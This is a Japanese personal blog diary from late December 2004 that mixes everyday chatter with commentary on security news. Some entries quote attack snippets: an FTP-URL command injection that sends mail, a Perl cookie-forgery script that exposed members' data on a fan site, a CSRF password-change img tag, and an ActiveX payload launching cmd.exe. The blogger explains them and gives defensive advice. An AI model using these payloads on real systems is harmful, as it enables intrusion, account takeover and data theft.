大量のダミーファイルでWinnyユーザーをうんざりさせるソリューション
textileコンテンツシェルタは、コンテンツホルダーからの相談に応じて、各種ネットワークを監視・調査し、場合によってはダミーファイルを大量に流通させて本物のコンテンツを紛れ込ませる対策を実施するソリューション。ダミーファイルの配信は、「Winny」や「2ちゃんねる」の画像掲示板、P2Pファイル交換ソフト「Share」が対象となっており、「事前に実施した音楽CDのダミーファイルをWinnyで配信する実験では、同じファイル名のうち約95%がダミーファイルという結果になった」という。はははは。(苦笑) でも、ま、消すことができない以上、こうするしかない訳で、それを望む人がいるのなら商売になってもおかしくないか。(^-^;関連: * Whizzy R&D
[雑談] * ファイル交換ソフト利用者を狙う新たな詐欺か? (/.jp)
```textileJASRACの* プレスリリース
によると、「日本著作権協会」または「東京著作権協会」の依頼を受けた法律事務所と偽って、ファイル交換ソフトを使用しているかどうか、使用している場合は、「解決のため自宅に赴く」とする電話がかかっているということである。…ところでファイル交換ソフトを利用した音楽ファイル不正アップロードユーザーの発信者情報開示請求をしているのはJASRACではなく日本レコード協会である。```色々と思いつくものですね。(^-^;関連: * JASRAC、ファイル交換ソフトの調査を装った電話に注意を呼びかけ
[雑談] * 米国企業の多くは「仕方なく」ICタグを導入 (IT Pro)
textile「多くの米国企業がICタグに飛びついたように見えるかも知れないが、実際には仕方がなくICタグの導入を進めている企業が多い」。…世界最大の小売業である米ウォルマート・ストアーズが、2005年1月から約100社の主要サプライヤに対し、納入する製品のケースやパレットにICタグの取り付けを義務づけるからだ。もちろん、これ1社の影響だけがすべてじゃないとは思いますが、なるほど、買い取り側のほうから催促するなんて状況もあるわけか...(^-^;[動物] * 猫のからだのしくみ (花王)
皆さん、猫雑学つけましょう♪ * 某ずきん
、* 某るふぃさん
によると強制だそうです。wあぁ、確かにかわゆい。⇒* 足フェチのアナタへ!贈り物
[雑談] * セブンのおでん、店により味の格差あり!(叫) (arkarkのありのまま。)
色々とコダワリがあるんですねー。(^-^) おいしいところで食べたいものです。[雑談] * クリスマス☆デートナビ2004 (東京デートナビ)
皆さん、心ゆくまで楽しんで来てください...(>_<)2004/12/24(金)金曜日ー。(ひとりきりのクリスマス・イブ〜♪)
[雑談] 2004年知ってる度テスト、ボキャ王
- 2004年知ってる度テスト (goo)
textileNice (いいですねー)
得点数:54ポイント (100ポイント中)とてもよくがんばっています。話題の言葉をもっと知るには、情報源として注目ワードやニュースを見るとよいでしょう。
- 語彙数推定テスト ボキャ王(ボキャキング) (goo)
textileあなたの語彙数 は 57100 語程度です。全体: あなたは全体28790人のうち6646位です。 性別: あなたは男性20544人のうち4902位です。 年齢: あなたは25歳から29歳の6068人のうち1174位です。 就学状況: あなたは社会人の15647人のうち4191位です。深く考えずにチェックをするのがコツです。(ぇ[雑談] * 香港当局、おなら爆弾は危険として回収を命ず (なんでも評点)
textile海外ではこのところFart Bomb(おなら爆弾)というジョーク・トーイが出回っている。…まず、内側の風船を潰すと、“地獄から直輸入された悪魔の液体”が中から出てくる。その状態で袋を振ると、液体が粉と混ざって化学反応が起こり、袋全体が膨らむ。そして、ついには大きな“放屁音”と共に、この世のものとは思えないほど臭いガスが外に噴出するのだという。強烈すぎて、吐き気・頭痛・目の痛みが起こる場合があるとか。(^-^;⇒* Pranks & Gag Gifts: Fart Bomb Bags
[セキュリティ] * Flashsky Security Advisory
Xttp://www.xfocus.net/flashsky/icoExp/loadimage.htm
- [AD_LAB-04004]Microsoft Windows LoadImage API Integer Buffer overflow
Xttp://www.xfocus.net/flashsky/icoExp/aniblue.htm
- [AD_LAB-04005]Microsoft Windows Kernel ANI File Parsing Crash Vulnerability
Xttp://www.xfocus.net/flashsky/icoExp/anidos.htm
- [AD_LAB-04005]Microsoft Windows Kernel ANI File Parsing Dos Vulnerability
Xttp://www.xfocus.net/flashsky/icoExp/search.hlp
- [AD_LAB-04006]Microsoft Windows winhlp32.exe Heap Overflow and Integer Buffer overflow Vulnerability (heap)
* (BOf)Xttp://www.xfocus.net/flashsky/icoExp/search1.hlp
そこはかとなくキケンな香り。リモートからのカーネルクラッシュのお話。(ちょっと怖かったのでイキナリ飛ばないようにリンクを変更しました。)[雑談] * 隠れオタが飲み会で一般人にされると困る質問
- ずきんさん
のところから。俺だったら・・・、textile忘年会のシーズンです。隠れオタが一般人にされて回答に困る質問を挙げてください。順位選択項目有効票数(投票数)割合1休日の過ごし方 12(48)17%…………6ヲタクってどう思う? 5(10)7%…………9ファッション関係 2(4)2%9趣味 2(3)2%…………12恋愛遍歴 1(4)1%あたりを持て余すかも。アニメとかコミケとかは俺は全然。むしろ・・・(以下略)[セキュリティ] * [Full-Disclosure] Internet Explorer FTP client can be used to send mail
- 12月10日の日記
に書いた、Internet Explorer FTP Command Injection の問題を応用して、メールを送信できる、という指摘。(^-^;textile<img src="**ftp://**foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a<>%0d%0aRCPT%20TO%3a<ian-example%40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20ian%40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net**:25**/" />関連: * IE-FTP-SMTP-link
[セキュリティ] * Windowsの新しい欠陥を悪用するエクスプロイトコードが公開に (ITmedia)
textileWindowsのLoadImage機能にある脆弱性を悪用されると、ウェブサイトや電子メール内にある特別に作成されたイメージをコンピュータが表示した際に、そのPCが改ざんされる可能性がある。Windowsのヘルププログラムにあるもう1つの脆弱性も、ヘルプファイルを開くすべてのプログラムに影響する。…「いずれも比較的深刻な問題だ。イメージ処理を行うものや、ヘルプファイルを読み込むものに悪用される可能性がある」この問題を利用したウィルス・ワームが出るのも時間の問題ですね。今はホリデーシーズンで人がいないので、「この種のものを発表するタイミングとしては、いまは最悪の時期にあたる」と。はい。(汗関連: * ISC SANS 2004-12-23
[動物] * 5万ドルでクローン猫 米でペットの「コピー」販売 (asahi.com)
textileかわいがっていた猫を亡くした愛猫家の女性の注文で、米国の会社が体細胞クローン技術を使ってクローン猫を誕生させ、配達していたことが22日明らかになった。ペット商売にクローン技術を採り入れた米国初の事例だ。…料金は5万ドル(約520万円)だった。…専門家も「個性も含め、そっくりコピーするのは不可能」と指摘している。クローン動物に健康上の問題が起きやすいとの警告も出ている。う゛ーん。可愛がっていた猫が不幸にも死んでしまったら、ゆっくり寝かせてあげましょうよ・・・。[セキュリティ] * 第2回 情報が漏れた! まず何をすればいいのか? (@IT)
textileインフラは何とかなりつつあるものの、顧客から「架空請求」に関するクレームがきた。調べてみると、どうも中村君の勤務先が管理している顧客情報が漏れた疑いが。ホントに中村君のところから情報が漏れたのか? そしてどこからどう情報が漏れたのか? 手を付けられるところから調べつつ、対策を検討することに……。新にわか管理者奮闘記の第2回が公開されました。[雑談] * 25年後に小惑星が衝突? 確率300分の1、NASA (asahi.com)
textile2029年に小惑星が地球に衝突するかもしれない——。そんな見通しを、米航空宇宙局(NASA)の専門家が示した。…「この小惑星が2029年4月13日に地球に衝突する確率は300分の1だ」と述べ、衝突の際のエネルギーは広島型原爆の約10万倍にあたる1600メガトンほどと推定した。平野部に衝突すれば大都市と周辺部を壊滅させ、海に落ちても大津波を引き起こす恐れがあるという。『アルマゲドン』、『ディープインパクト』、『アステロイド』な世界ですか。(汗今のうちから核兵器を載せた小惑星破壊船と、ノアの箱舟な巨大シェルターの準備を。**[追記]** を。本当にこんなのあるんですね。(^-^;⇒* 彗星に衝撃弾を打ち込む、NASA版『ディープ・インパクト』
[雑談] * 一人寂しくクリスマスを過ごす会
@openmya-Hikitextile**一人寂しくクリスマスを過ごす会って何ですか?**クリスマスだというのに一緒に過ごすパートナーがいない寂しい人たちの集団です。だーれーだー! 俺を勝手に名誉会員にしたのはっ!(笑)名誉会員って、もし今後彼女ができても抜けられない勢いの名称だな。(^-^;[IT] * SoftEther VPN User-mode Router 2.0 (SoftEther.com)
が発表されたようです。◆* ソフトイーサ、「筑波ACルータ」は一般ユーザー権限で利用可能に (CNET)
textileソフトイーサは、一般ユーザー権限でもリモートアクセスを実現できる「SoftEther VPN User-mode Router 2.0」のβ1の無償ダウンロードを開始した。インストールや動作が一般ユーザー権限で可能になるほか、仮想NATサーバおよび仮想DHCPサーバがユーザーモードで動作するため、カーネルモード特権が一切行使されなくなっている。問題発生時にも、管理者権限で動作させているよりも影響する範囲が少なく、セキュリティも飛躍的に向上した。頭がイタイ管理者の方、多いんでしょうね...(^-^;[雑談] * 「フィッシング詐欺」被害を初めて確認と警察庁 (ZAKZAK)
textile警察庁は24日、銀行など企業からのメールを装って受信者が偽のホームページ(HP)にアクセスするよう仕向け、入力させた個人情報を悪用して金品をだまし取る「フィッシング詐欺」の被害を、初めて確認したと発表した。なーんで今ごろになってやっと“初めて確認”なんだろう?!2004/12/25(土)土曜日ー。(ひきこもり♪ クリスマスなのに・・・。)
[便利] * zphoto: Flashベースのフォトアルバムを作るツール
textilezphoto は Flash ベースのフォトアルバムを作るツールです。デジカメ写真から Flash を用いたフォトアルバム (オンラインアルバム) を簡単に作成できます。
- ともちゃさんの日記
で使われてるのを見て、かんどーしました。格好良いですね、これ。(世の中には Flash キライな人も多いかも知れないけどー。(^-^;)[雑談] * ♪さきっちょ&はあちゅう♪の悪あが記
『クリスマスまでに彼氏を作るblog「* 悪あが記
」』がいよいよ佳境に!? 他人事だとは思えないから、ぜひ頑張って欲しいです。(^-^;[雑談] * エスカレーター:地下鉄駅で歩行禁止 名古屋市議会で論議 (毎日新聞)
textile名古屋市議会本会議でこのほど、今年夏から市営地下鉄の駅のエスカレーター上での歩行が禁止され、2列で立ち止まって利用するようになった問題が取り上げられた。質問したのは稲本和仁市議。「右側1列を空けるのが慣例なのに、なぜ突然歩行を禁止したのか」とただした。…稲本市議は「耳に届く声の8割は、右空け通行がなぜいけないのかという内容だ」と指摘。お。私も必ず歩く派なので、なぜいけないの?って思いますね。ってゆーか、そんなの市側が明示的に禁止するものでもあるまいに。[セキュリティ] * ヨン様狙われた!公式HPにハッカー侵入 (日刊スポーツ)
```textile韓国俳優ペ・ヨンジュン(32)の公式ホームページ(
)に23日から不正なアクセスが殺到し、同夜にHPが閉鎖される事態に陥った。セキュリティー対策などに時間がかかるため、再開は早くても年明け以降になるという。…犯人は、サーバー内から登録者のID、パスワードなどの個人情報を盗んだり改ざんしたほか、登録者になりすまして個人情報を掲示板に書き込んだりしていたという。```『* ペ/ゆうこりん祭りまとめ
』に経緯がまとめられているようです。textile**2004年12月23日午後6時ごろ:**ペ公式のセキュリティーホールを発見。誰にでもわかる簡単なCookieで個人情報が垂れ流しにされていることが発覚。↓2ちゃんねらがペヲタの個人情報を公開(ZIPファイルなどになって出回る)。IDを乗っ取って投稿などする。『
』によれば、textile23 :オレオレ!オレだよ、名無しだよ!! :04/12/25 02:27:01#!/usr/bin/perl…$userid = '';#ユーザーID$request = HTTP::Request->new('GET' => 'http://www.yongjoon.jp/mypage/member1.asp');…$request -> header('Cookie' => "myid=$userid; cfyuid=$userid;");…これで見れたんだと。今はアクセス不可になってるとのことなので、どうやら Cookie に ユーザID がそのまま入っていて、それを 他人のID に改ざんしてアクセスすると、他人の登録情報が見えた、という内容のようですね。[セキュリティ] Webアプリの怖さを知らない開発者**# まー (2004/12/25(Sat) 13:44) **このソースから見ると・・・作り手がWebアプリの怖さを知らなかったとしかまったくですね。(^-^; 昔作ったアプリに残ってるというならまだ話は分かるんですが、このサイトは結構最近に作ったんでしょうから、当然、対応していて欲しいところですよね、、、Webアプリ開発者ならば、下記の内容くらいは抑えておいて欲しいところです:
- 秘密情報を含まないCOOKIEに頼ったアクセス制御方式の脆弱性 (SecurIT)
- 安全なWebアプリ開発40箇条の鉄則 (高木先生)
**[PDF]**
- セキュア・プログラミング講座 (IPA ISEC)
☆『安全なWebアプリ開発の鉄則 2004年版』はどこかで公開されないんですかね〜♪[セキュリティ] NGSSoftware から大量のアドバイザリが・・・textile『Severity: High risk』がたくさん。。。(パッチ出てますので適用・確認を。)[セキュリティ] * Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise (Greyhats Security)Oracle ISQLPlus file access vulnerability (#NISR2122004E) Oracle Trigger Abuse (#NISR2122004I) Oracle Character Conversion Bugs (#NISR2122004G) Oracle extproc buffer overflow (#NISR23122004A) Oracle extproc directory traversal (#NISR23122004B) Oracle extproc local command execution (#NISR23122004C) Oracle clear text passwords (#NISR2122004D) Oracle TNS Listener DoS (#NISR2122004F) Oracle multiple PL/SQL injection vulnerabilities (#NISR2122004H) Oracle wrapped procedure overflow (#NISR2122004J) IBM DB2 rec2xml buffer overflow vulnerability (#NISR2122004J) IBM DB2 generate_distfile buffer overflow vulnerability (#NISR2122004L)
今まで見つかった複数の手法を組み合わせることで、ページを閲覧するだけで Windows XP SP2 のシステムを侵害することができる exploit ができたようです。(汗2004/12/26(日)日曜日ー。(年末っぽい。)
[IT] * 【特集】PDF再入門 - フリーツールでどこまで行ける? (MYCOM PCWEB)
```textile1. * 気づけば普及の進むPDFフォーマット
2. * そもそもPDFって何? - PDF再入門
3. * PDFを使うメリットとは?
4. * そもそもPDFって何? - PDF再入門(2)
5. * PDFWriterとDistillerの違い
6. * PDF作成ツールの現状 - OS Xではシステムと一体
7. * PDF活用の現場
8. * サードパーティー製PDF作成ツールを試す(1)
9. * サードパーティー製PDF作成ツールを試す(2)
10. * Acrobat 7.0の新機能(1)
11. * Acrobat 7.0の新機能(2)
12. * まとめ - いずれは空気になるかも?
```『サードパーティー製PDF作成ツール』では、「* クセロPDF v1.1
」と「* PrimoPDF
」と「* いきなりPDF
」が比較されていました。他にフリーと言えば、「* pdf995
」なんてのもありましたねー。[IT] * Windowsのヘルプファイルが表示される手順 (はせがわさんの日記)
textileWindowsのWinHlp32.exeにバッファオーバーフローが見つかった話に関していろいろ。Windowsのヘルプファイルが表示される手順には、いくつかの種類があります。1. ヘルプファイル(*.hlp)をダブルクリックする 2. http://www.example.com/help.hlp のようなリンクをクリックする 3. ヘルプ(WinHlp32.exe)を起動しておいて、「ファイル」「開く」でヘルプファイルを開く 4. アプリケーション内でF1を押す等、ヘルプを呼び出すこの後、(ドキュメントには載ってない)ヘルプファイルの検索順の話とか色々と興味深い話が! (ってか、これらの情報のカタマリが、どこをどう間違ったら『週2〜3回の更新で、生活一般な話を、自分の備忘録として書いてる平均的なblog』に見えるんだ?(笑))[雑談] * 「NHKが受信料不払いに対抗手段」と東スポ
textile増え続ける「受信料不払い」に、NHKがなりふり構わず挽回を図っている…。その作戦は、集金員に「女性」を大量に投入する、名付けて「フローラル・スタッフ」。…しかし、視聴者からの反応は「契約を解除しようとしていたら、弱々しそうな50歳ぐらいの女性が集金に来た。ついつい強いことを言えなくなった」(45歳男性)、「冬のソナタのパンフをチラつかせながら支払いを迫るなんて姑息」(43歳女性)など、あまり芳しくない。ははは。(笑) すごい作戦です・・・。(^-^;[雑談] * モジラ、MS Outlookに対抗する新プロジェクトを立ち上げ (CNET)
textileMozilla Foundationは「Lightning」と名付けられたプロジェクトを通して、カレンダーアプリケーションの「Sunbird」と、最近発表された電子メールアプリケーションの「Thunderbird」を統合していく計画だ。…ユーザーが電子メールとカレンダーの内容を横断的に検索したり、電子メールメッセージをカレンダーに転記したりできるようにすることだ。色々、選択肢が増えるのは良いことですね。(^-^)関連: * Lightning Project Launched to Provide Calendar Features for Mozilla Thunderbird (Mozilla)
[雑談] ・・・。orzリファラに、```textile* http://openmya.hacker.jp/hiki/hiki.cgi?一人寂しくクリスマスを...
×2```とかあるのを見ると、まぢでヘコむんですが・・・?(笑)[セキュリティ] * Perl "File::Path::rmtree" Race Condition (Secunia)
適当に和訳:textilePerl の "File::Path::rmtree" には、ローカルユーザが権限昇格を試みることができる脆弱性があります。これは、"File::Path::rmtree" がファイルを削除する前、対象ファイルのパーミッションを変更する際にレースコンディションに陥ることに起因する問題です。攻撃者は、任意のファイルにシンボリックリンクを張ることで、この問題を攻略することが可能です。攻撃が成功した場合、任意のファイルの権限変更や削除が可能となります。まぁ、どうということのない問題ですが。(^-^;[TV][ドラマ] 2004年冬ドラマランキングヤマガタが独断と偏見で選んだドラマランキングです。結構見てました。(^-^;順位TV局ドラマ名ひとこと1フジテレビラストクリスマス賛否両論ありましたが、さすがは月9です。2日本テレビナースマンがゆく香里奈さん、可愛いです。。。3フジテレビめだかミムラみたいな先生いたら、ぜひ習いたいですね。4TBS夫婦。夫婦って色々あるなあ、と。5フジテレビマザー&ラヴァーここまで極度のマザコンだと清清しいくらい?6TBSホットマン2小西真奈美さんはどこへ行ったんでしょうか。7日本テレビ一番大切な人は誰ですか誰でしょう?8テレビ朝日相棒特にコメントなし。2004/12/27(月)月曜日ー。(あいのりスペシャル♪)
[雑談] 国会図書館からの調査 by ndl-japan-research-robot『* ただのにっき
』に興味深いネタが。```textile数日前から、referer付きでアクセスしてくるbotが襲来している。最初は「NTTDATA-RDbot」だったんだけど、その後「ndl-japan-research-robot」になったようだ。refererに含まれるURLから* 国会図書館の調査
だとわかるんだけど、これって、まさに* Tech総研で昨日ネタにした話
だよな。ふうん、NTT DATAが請け負ってるんだ。けっこうアクションが早くて、感心。```ってことで、さっそく調査が始まっている模様。(しかも、発注先もバレバレですか。(^-^;)残念ながら、この日記には、まだ収集に来てくれていないようですが、日本国民として認められてな...私の頑張りが足りないせいでしょうか?(笑)[雑談] * 基礎解説:フィッシング詐欺 いまさらフィッシング詐欺にだまされないために (@IT)
最近では、ブラウザの脆弱性や、サイト側の脆弱性(クロスサイトスクリプティングなど)と組み合わせた、高度なフィッシング詐欺が出てきていますので、注意が必要ですねー。(昔、「メールのリンクを信用せずに検索エンジンで見つけよう!」なんて話もありましたが、それを逆手に取る詐欺サイトも出てきたりして、結局はイタチゴッコなんですよね。偽モノを見分ける“カン”を養うしかっ!(^-^;)[雑談] * 「海賊版販売は犯罪です」——ACCS、路上販売多発の新宿に看板 (ITmedia)
textileコンピュータソフトウェア著作権協会(ACCS)は12月24日、警視庁新宿署、新宿区、新宿防犯協会と協力し、PCソフト海賊版を路上販売しないよう呼びかける立て看板20本を、JR新宿駅西口の電気街各所に設置した。看板には「許可なき路上販売はやめなさい。コンピュータソフトの海賊版や偽ブランド品などの販売行為は犯罪です。違法な行為は逮捕する!」と表記。黄色地で目立つようにした。日本でも違法ソフトの路上販売なんてあるんですか。* 中国の話(10元)
を思い出しましたが。それにしても、強い口調の看板ですねー。ACCSの久保田理事がものすっごく嬉しそうに看板を設置してる写真(記事後半)と対照的でちょっと笑ってしまった。(^-^;[雑談] * H16.11.30 京都地方裁判所 平成15(わ)2018 著作権法違反被告事件
Winny を用いて映画を共有してた人への有罪判決の全文だそうです。(懲役1年、執行猶予3年)ところで、弁護人って、textile(弁護人の主張について)⑥ 被告人が,そのパーソナルコンピュータをインターネットに接続するために使用した回線は,光ファイバーであるところ,光は電気ではないから,光ファイバーは,電気通信回線にも有線電気通信にも該当せず,被告人の行為は,送信可能化権侵害罪の構成要件に該当しない。こーんな主張してみたりするんですね。(^-^;textile② 弁護人の主張⑥について…しかし,電気通信とは,有線,無線その他の電磁的方式により,符合,音響又は映像を送り,伝え,又は受けることと定義されており(電気通信事業法2条1号),換言すれば,電磁波を用いて種々の情報を送信又は受信することが電気通信であり,電気が電磁波の一種であることは多言を要しない。…そして,光ファイバー通信は,光という電磁波を利用した電磁的方法により,種々の情報を送信又は受信するものにほかならないのであるから,これが電気通信の概念に含まれるものであることは明らかである。ま、結局、ばっさり斬り返されちゃいました。残念ッ!(違[雑談] * グーグル、2004年の“Google”総合キーワードランキングを発表 (ASCII)
(かなり出遅れましたが、)気になったものがあったので載せてみるテスト。textile6位が「占い」きっと夜な夜なずきんさんが“変な占い”をぐぐった成果かと。(笑)[雑談] * 総務省、迷惑メールに関する研究会の中間とりまとめを公表 (INTERNET Watch)
textile中間とりまとめでは、2002年7月に施行された特定電子メール法の見直し案を提示。法の対象となるメールについて、携帯電話のショートメッセージサービスや、法人のメールアドレスへの大量メールの送信も法の対象とすることが適当と考えられるとしている。また、機械的に生成したアドレスなどにメールを送信する行為について、広告や宣伝のみが禁止となっている点を改め、送信そのものを禁止することや、悪質な違反行為については送信者に直接刑事罰を科すことも検討することが適当であるとしている。今まで、携帯のショートメッセージとか法人メアドは対象外だったんですかー。現状の法律⇒* 特定電子メールの送信の適正化等に関する法律 概要
(* 条文
**[PDF]**)関連: * 迷惑メールへの対応の在り方に関する研究会 中間とりまとめ (総務省)
[雑談] 人気MUAランキング@openmyaMLopenmyaMLで、メンバーが投稿に使用してるメーラーの人気ランキングを作ってみました。textile使用者数(人)構成比(%)投稿数(通)MUA名7631.7%3163Becky!3313.8%2298...@gmail.com2912.1%1348Microsoft Outlook Express135.4%847...@yahoo.co.jp114.6%383Mew104.2%1176Winbiff93.8%256EdMax83.3%172Mozilla Thunderbird83.3%37AL-Mail3272.9%130Wanderlust72.9%34Apple Mail62.5%97Microsoft Office Outlook62.5%89TuruKame62.5%51SquirrelMail52.1%264Sylpheed31.3%45...@hotmail.com31.3%58nPOP※構成比(%)は、使用者数に対する構成比です。ということで、圧倒的に Becky! が人気でした。""ハ(^▽^*) パチパチ♪2004/12/28(火)火曜日ー。(仕事納め。)
[便利] * vnc2swf
textile**これなに?**Vnc2swf は画面録画ツールです。X-Window (X11)、Windows および Mac OS の画面を記録できます。 Vnc2swf は VNC プロトコル を使って動きを記録し、それを Macromedia Flash(TM) ムービー形式 (.swf 形式) に変換します。おー。面白い。サンプルムービーをご覧ください。Webページでなんかのデモする時やセミナー資料などに使えそうかも。 昔、UNIXコマンドラインの録画/再生ができる『* ttyrec: ttyレコーダー
』も感動しましたが、GUI をいきなり Flash化できるなんて! (録画元として Windows が使えたら、もっと良いのになー。)ネタ元: * RIPさんの日記
[セキュリティ] * [Full-Disclosure] IE sp2 and Mozilla Firefox DoS.
Internet Explorer SP2、Mozilla Firefox に有効な DoS だそうです。textile<html> <head> <title> ....(put)3.5 MB OF data....... </html>・・・エレガントじゃないなぁ・・・。(^-^;[雑談] * 本気でパワードスーツづくりに励むアラスカの青年 (CNET)
本気なのですね。でも、格好良さでは『* イギリス発すごいロボット発見(AZOZ BLOG)
』には負けますかねー。(こっちは合成だと噂ですけども。格好良いもん。)[セキュリティ] Webアプリの脆弱性、セッションライディングについて『* SESSION RIDING [PDF] by SecureNet
』が
- 国分さんのところ
で紹介されていました。要するに、Cookie のみで最終処理を行っているWebアプリにおいて、サイト利用者が悪意あるリンクに誘導された場合、意図せぬ最終処理が実行されてしまう、という(だいぶ昔からあるお話)ですね。例えば...ユーザのパスワードを変更する動作を考えてみます。【通常の処理の流れ】1.ユーザID/パスワードでサイトにログイン。(⇒Cookieでセッション管理)2.ユーザ情報変更画面を表示。3.パスワードを「himitsu」に変更。 http://damedame.example.jp/password_change.cgi?new=himitsu※当然、未ログイン状態で 3.にアクセスしてもエラーとなる作りだと思ってください。【セッションライディング】1.このサイトにログイン中のユーザが、悪意あるWebページやHTMLメールなどを表示します。2.そのページに、例えば、 <img src="http://damedame.example.jp/password_change.cgi?new=aaa" width=0 height=0> のようなHTMLタグが存在しています。3.ユーザの知らないうちに、パスワードが「aaa」に勝手に変更されてしまいます。【これを防ぐためには】Webアプリ側での対策実施が必要です。少なくとも、重要な最終処理に関しては、Cookie 以外に、HIDDENパラメータなどでのセッション管理を併用すること!例えば、 http://damedame.example.jp/password_change.cgi?new=himitsu&sid=1dEc2wjO0rのように、Cookie 以外のセッション管理パラメータを追加しましょう。この sid は、当然、Cookie での セッションID とひも付けて管理し、両方の値が正しくないと処理が進まないようにします。セッションID は、SHA-1 や MD5 などのアルゴリズムを利用し、絶対に1から自作しようなどとは考えないこと。また、セッションごとに異なる、予測の出来ない値を使うこと、が重要です。と、無謀にも、ちょっと解説してみたりしてみました。(笑)2004/12/29(水)水曜日ー。(今日もお仕事中の人、頑張れ♪)
[雑談] * おとな診断 (@nifty)
textile級位 おとな一級あなたはややこどもです。ふだんはおとなっぽく行動しているのに、ときどきこどもみたいになってしまうことはありませんか。年をとった猫なのに、急にじゃれたりするようなものでしょか。かなりのお子ちゃまぶりを発揮してますが、本当の私は。ネタ元: * palm84さんのところ
[セキュリティ] * 実録? セキュリティ管理者の嘆き (ITmedia)
こーゆー系のお仕事してる人、openmyaML には結構いらっしゃるのかな? 教訓の中に『灯台下暗し。専門家ほど自分の行動には注意しよう』なんてのもありますね。気をつけましょう♪[セキュリティ] * Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife
Windows版 Netcat v1.1 (nc11nt.zip) で "-e" (接続と同時にコマンド起動)オプションを指定して接続待ちをしている場合に、リモートから攻略可能なバッファオーバーフローが存在するそうです。netcat は、自分のマシンに真っ先に入れるツールの1つですので、ちょっとショックですね。修正版は提供されないようです。("-e" は inetd 代わりに使うこともありますが、おまけ機能みたいなもんですから、(テンポラリ以外では)それほど使ってるところも多くなさそうですけどね。(^-^;)関連: * Netcat "SessionWriteShellThreadFn()" Buffer Overflow Vulnerability (Secunia)
[雑談] あ、雪だ・・・!ふと外を見たら雪が降ってた。結構なイキオイですねー。[雑談] * 教えて!ティーチャー先生 〜 恋人との身長差(回答編)
『恋人との理想の身長差』アンケートの結果とのことです。textile【男性の理想】自分より背が高い人が理想 → 540票(13.5%)同じくらいが理想です → 465票(11.6%)10センチ低いくらいがいい → 1375票(34.4%)20センチくらい低いと最高 → 476票(11.9%)20センチ以上低いのが理想 → 215票( 5.3%)身長差は全く気にしません → 928票(23.3%) 【女性の理想】高ければ高いほど理想です → 493票(11.3%)20センチくらい高いと理想 → 1669票(38.4%)10センチ高いくらいが理想 → 1258票(28.9%)同じくらいが理想です → 187票( 4.3%)自分より低い方がいいです → 100票( 2.3%)身長差は全く気にしません → 645票(14.8%)私は、20センチくらい低い子が良いかなー。お。女性側のニーズと合ってるじゃないですか♪ うん。よろしくお願いしまーす。(何[セキュリティ] * MS、脆弱性情報の予告なし公開に警鐘 (ITmedia)
textileWindows関連の未パッチ脆弱性が相次いで報告されているが、Microsoftはこの件を苦々しく思っているようだ。…「脆弱性はベンダーに直接報告するという一般に受け入れられている慣行は、すべての人の利益にかなうものであり、セキュリティ問題に対して修正の開発中に顧客が悪質な攻撃にさらされることなく、包括的で質の高いアップデートを手にすることを保証する一助になると当社は確信している」と広報担当者。最近、ゼロデイが多すぎですものねー。(ま、ベンダーに通知しても、これは脆弱性じゃない!と突っぱねられたり、まったく放置されたりということが多すぎて、報告する側も最初からあきらめモードだったりしちゃうのかも? 応答期限付きでの通知だの、昔は色々と手段が模索されたものですけどね...)関連?: * マイクロソフト セキュリティ情報の「謝辞」に関するポリシー
[セキュリティ] * netcat 1.11 for Windows is released
の件、修正版が公開されたようです♪関連: * Netcat v1.11 For Windows , New fixed version (Bugtraq)
[セキュリティ] * [Full-Disclosure] Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability
◆* #57707 Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability (Sun Microsystems)
textile問題点の概要Java Runtime Environment (JRE) に、リモートから Java Virtual Machine を応答停止に追い込むことのできる脆弱性が存在します。問題のあるバージョンSDK and JRE 1.4.2_05 and earlier, and all 1.4.1 and 1.4.0 releases for Windows, Solaris and Linux 修正方法下記以降のバージョンで修正済みSDK and JRE 1.4.2_06 and later for Windows, Solaris, and Linux[雑談] そろそろ携帯、替えようかなぁ。私は今、* mova P504i
(2002年発売) を使っていて、何にも不満は無い(ってか、むしろ気に入ってる)のですが、さすがに時代の流れに取り残されてる感が出てきたので、ちょっと買い替えを考えてみたり。(決して、会社で後輩に新しい携帯を自慢されたから買い換えるんじゃありませんよ?(笑)) 候補として、* FOMA F901iC
が良いかなー、と思ったんですが、P504i と比べると、やはりかなりデカい&重いんですよねー。P504i の* 驚異の薄さ&軽さ
は手放せません。うーむ、悩み中。。。[セキュリティ] * Discussion about the exploit CMDExe (Remote code execution with parameters)
悪意あるWebページを閲覧するだけで、閲覧者マシン上で任意のコマンドが実行されてしまう脆弱性の詳しい解説。(Windows XP, 2003 上で IE 6.0 以上を使用しているユーザが対象。)textile閲覧者のローカルにあるHelpファイル“c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm”を表示させる。外部にあるスクリプトファイルを読み取りに来るように JavaScript で追記する。セキュリティ制限無しにスクリプトが実行できるので、例えば、document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");のようにして、ActiveX 経由で cmd.exe を起動したりできる。PoC⇒http://freehost19.websamba.com/shreddersub7/htm.htm[雑談] スマトラ沖地震のニュースを見てたら、、、海上自衛隊が、国際緊急援助隊派遣法に基づいてタイに災害派遣した護衛艦の名前、「たかなみ(高波)」なんですね。・・・ブラックユーモアですか?(汗2004/12/30(木)木曜日ー。(今年も残りあと2日かー。)
[雑談] * おふろ診断 (@nifty)
textileあなたは「洗面器」です。これがないとお風呂になりません。必要不可欠な存在、それがあなたです。その重要性や存在感は誰もが認めるところです。しかし思い返してみると家の洗面器が何色だったか思い出せないから不思議です。存在感あるはずなのに、ねぇ。私は、存在感あるけども、でも必要時以外は思い出せない存在、と。(^-^;ネタ元: * palm84さんの日記
[雑談] * 年末年始ひきこもり企画 冬ごもりしたい人のためのネットサービス〜食材調達編 (ITmedia)
```textile“冬ごもり”に利用したいネットサービスを紹介する年末年始ひきこもり企画。映画好きに贈る「* DVDレンタル編
